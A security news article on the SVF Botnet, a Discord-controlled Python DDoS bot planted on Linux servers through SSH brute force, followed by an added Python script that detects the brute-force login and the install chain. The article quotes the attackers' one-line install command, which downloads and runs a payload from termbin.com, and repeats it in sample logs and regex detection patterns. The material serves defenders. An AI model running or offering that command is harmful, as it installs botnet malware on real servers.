Threat Actors Attacking Linux SSH Servers to Deploy SVF Botnet
Cybersecurity researchers have uncovered a sophisticated attack campaign targeting poorly managed Linux servers through SSH brute force attacks to deploy the SVF Botnet, a Python-based distributed denial-of-service malware.
The malware leverages Discord as its command-and-control infrastructure and employs multiple proxy servers to amplify its attack capabilities against targeted systems.
The SVF Botnet represents a notable evolution in DDoS attack tools, combining traditional brute force techniques with modern communication platforms.
Threat actors exploit Linux servers with weak SSH credentials, transforming compromised systems into powerful DDoS weapons capable of launching both Layer 7 HTTP floods and Layer 4 UDP floods against victims.
ASEC analysts identified this malware through their honeypot monitoring systems, which detected numerous attempts to compromise SSH services using dictionary and brute force attacks.
The researchers observed that SVF Bot was created by the “SVF Team” allegedly for entertainment purposes after their previous PuTTY-based botnet ceased functioning.
The attack campaign demonstrates the persistent threat facing inadequately secured Linux infrastructure, particularly systems exposed to the internet with default or weak authentication mechanisms.
Infection Mechanism and Deployment
The SVF Botnet’s installation is automated as a single chained command. Upon successful SSH compromise, attackers deploy the malware using:
python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget https://termbin.com/4ccx -O main.py; python main.py -s 5
This command chain creates a Python virtual environment, installs the required dependencies (including the Discord libraries), downloads the malware payload as main.py, and runs it with “-s 5”, where “5” is the server group identifier.
The malware authenticates with Discord servers using embedded bot tokens and immediately reports successful infections through webhooks, enabling real-time botnet management and coordination for subsequent DDoS campaigns.
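The infection chain above gives a defender two observable stages: a burst of failed SSH password attempts followed by a successful login from the same source, and then a shell command that sets up a venv, installs the Discord libraries, fetches main.py from termbin.com and runs it with “-s”. The following Python script is an added example written for this article (it is not ASEC’s code or anything shipped by the SVF Team) that applies both checks to constructed sample logs; the log lines, host name, IP addresses and the assumed log year are constructed for illustration, and only the termbin URL and command string come from the article.

```python
"""Added example: detect the SVF infection pattern in SSH auth logs and
process-execution records. All sample data below is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (RFC 3164 style, no year), not real data.
AUTH_LOG = """\
Aug 10 12:00:01 host sshd[1001]: Failed password for root from 203.0.113.10 port 51000 ssh2
Aug 10 12:00:02 host sshd[1002]: Failed password for root from 203.0.113.10 port 51001 ssh2
Aug 10 12:00:03 host sshd[1003]: Failed password for invalid user admin from 203.0.113.10 port 51002 ssh2
Aug 10 12:00:04 host sshd[1004]: Failed password for root from 203.0.113.10 port 51003 ssh2
Aug 10 12:00:05 host sshd[1005]: Failed password for root from 203.0.113.10 port 51004 ssh2
Aug 10 12:00:07 host sshd[1006]: Accepted password for root from 203.0.113.10 port 51005 ssh2
Aug 10 12:05:00 host sshd[1007]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Aug 10 12:30:00 host sshd[1008]: Accepted publickey for alice from 198.51.100.7 port 40001 ssh2
"""

# Constructed process-execution records ("<user> <command line>"), e.g. as an
# auditd/EDR pipeline might emit them. The first line is the command from the article.
PROC_LOG = """\
root python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget https://termbin.com/4ccx -O main.py; python main.py -s 5
alice python -m venv venv; source ./venv/bin/activate; pip install requests
"""

FAILED_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+)")


def parse_ts(stamp, year=2024):
    """Syslog timestamps carry no year; the year is an assumption for this example."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def brute_force_then_success(log_text, threshold=5, window=timedelta(minutes=2)):
    """Alert on a successful login preceded by >= threshold failed passwords
    from the same source IP within `window` (a brute force that worked)."""
    failures = defaultdict(list)  # source IP -> timestamps of failed attempts
    alerts = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            stamp, _user, ip = m.groups()
            failures[ip].append(parse_ts(stamp))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            stamp, method, user, ip = m.groups()
            when = parse_ts(stamp)
            recent = [t for t in failures[ip] if when - t <= window]
            if len(recent) >= threshold:
                alerts.append({"ip": ip, "user": user, "method": method, "failures": len(recent)})
    return alerts


# Each indicator is one stage of the installation chain described in the article.
SVF_INDICATORS = {
    "venv_setup": re.compile(r"python3?\s+-m\s+venv\b"),
    "pip_discord": re.compile(r"pip install[^;&|]*\bdiscord\b"),
    "termbin_fetch": re.compile(r"wget\s+https?://termbin\.com/\S+\s+-O\s+main\.py"),
    "run_with_group": re.compile(r"python3?\s+main\.py\s+-s\s+\d+"),
}


def svf_install_hits(proc_log_text, min_indicators=3):
    """Flag command lines matching at least `min_indicators` stages of the chain;
    a lone venv or pip install is normal admin activity and is not enough."""
    hits = []
    for line in proc_log_text.splitlines():
        user, _, cmd = line.partition(" ")
        matched = sorted(name for name, rx in SVF_INDICATORS.items() if rx.search(cmd))
        if len(matched) >= min_indicators:
            hits.append({"user": user, "indicators": matched})
    return hits


if __name__ == "__main__":
    for a in brute_force_then_success(AUTH_LOG):
        print(f"brute force succeeded: {a}")
    for h in svf_install_hits(PROC_LOG):
        print(f"SVF install chain: {h}")
```

The two checks are deliberately independent: the login check fires on the credential-guessing stage even if the attacker later changes the payload, while the command check requires several stages of the chain together so that a legitimate venv plus pip install does not raise an alert on its own.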